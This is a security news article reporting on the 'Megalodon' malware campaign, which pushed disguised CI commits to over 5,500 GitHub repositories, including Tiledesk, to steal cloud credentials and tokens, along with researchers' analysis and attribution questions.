Megalodon Malware Campaign Poisons Over 5,500 GitHub Repositories
Table of Contents
A New Wave of Supply Chain Poisoning
GitHub is currently grappling with a massive, automated malware campaign dubbed “Megalodon,” which has successfully pushed malicious commits to more than 5,500 repositories. The attack, identified by researchers at SafeDep, represents a calculated effort to compromise the software supply chain by targeting the Continuous Integration/Continuous Deployment (CI/CD) pipelines that developers rely on to ship code.
The campaign follows a pattern similar to the earlier TeamPCP attacks, which hit roughly 3,800 repositories, but Megalodon is larger in scale and more precise in its execution. According to SafeDep, exactly 5,561 repositories were infected. The malware triggers once a repository owner merges the malicious commit, executing silently within the CI/CD environment to harvest sensitive data before propagating further into the ecosystem.
The Anatomy of the Theft
Megalodon is not designed to destroy data, but to steal the “keys to the kingdom.” Once active, the malware aggressively scans for AWS secret keys and Google Cloud access tokens. It doesn’t stop at basic environment variables; it actively queries metadata from AWS, Google Cloud Platform (GCP), and Azure to extract instance role credentials.
The scope of the exfiltration is comprehensive. The malware reads SSH private keys, Docker and Kubernetes configurations, and Vault tokens. It also employs a series of more than 30 regular expression (regex) patterns to scour source code for hardcoded secrets. Finally, it exfiltrates GitHub and Bitbucket tokens, which allows attackers to impersonate developers and move laterally across a company’s cloud infrastructure.
Moshe Siman Tov Bustan, a lead researcher at Ox Security, warns that this marks a shift in the threat landscape. “We’ve entered a new supply chain attack era,” Bustan noted, describing the current climate as a “tsunami of cyber attacks on developers worldwide.” He argues that the compromise of GitHub’s infrastructure puts every organization with a private repository at risk.
The Tiledesk Breach and the ‘Build-Bot’ Ruse
The attackers utilized a clever infiltration method by hiding the malware inside a legitimate open-source package. SafeDep discovered the poison inside Tiledesk, an open-source live chat and chatbot platform. In this instance, the attackers did not compromise the npm account directly. Instead, they compromised the GitHub repository itself. The maintainer, believing the source code was secure, published compromised versions 2.18.6 through 2.18.12 between May 19 and May 21, without ever knowing the code had been tampered with.
The technical execution of the commits was designed to blend into the background of a busy repository. SafeDep traced the malicious activity to an author listed as “build-bot,” using the email address build-system[@]noreply.dev. The commit message—”ci: add build optimization step”—was specifically crafted to look like a routine automated update. Because the attacker likely used a compromised Personal Access Token (PAT) or deploy key, they were able to push directly to the master branch, bypassing the standard Pull Request (PR) and review process.
Analyzing the Threat Actor
While the tactics mirror those of TeamPCP, researchers are not yet convinced that Megalodon is the work of the same group. While some analysts suggest a copycat, others point to the lack of specific identifiers used in recent supply-chain “competitions” hosted on forums like BreachForums. Specifically, Megalodon lacks the public encryption keys required by certain threat-actor contests to prove attribution.
The scale of the attack is evident in the logs. Researchers found two primary email addresses used for the onslaught: build-system[@]noreply.dev (responsible for 2,878 commits) and ci-bot@automated.dev (responsible for 2,841 commits). All of these attacks occurred within a tight six-hour window on May 18, demonstrating a highly automated and coordinated strike.
The fallout extends beyond Tiledesk, impacting projects like the Black-Iron-Project and WISE-Community, along with hundreds of smaller repositories. As cloud identities become the primary target for modern breaches, the Megalodon campaign highlights a critical vulnerability in how developers trust automated commits and manage their CI/CD secrets.
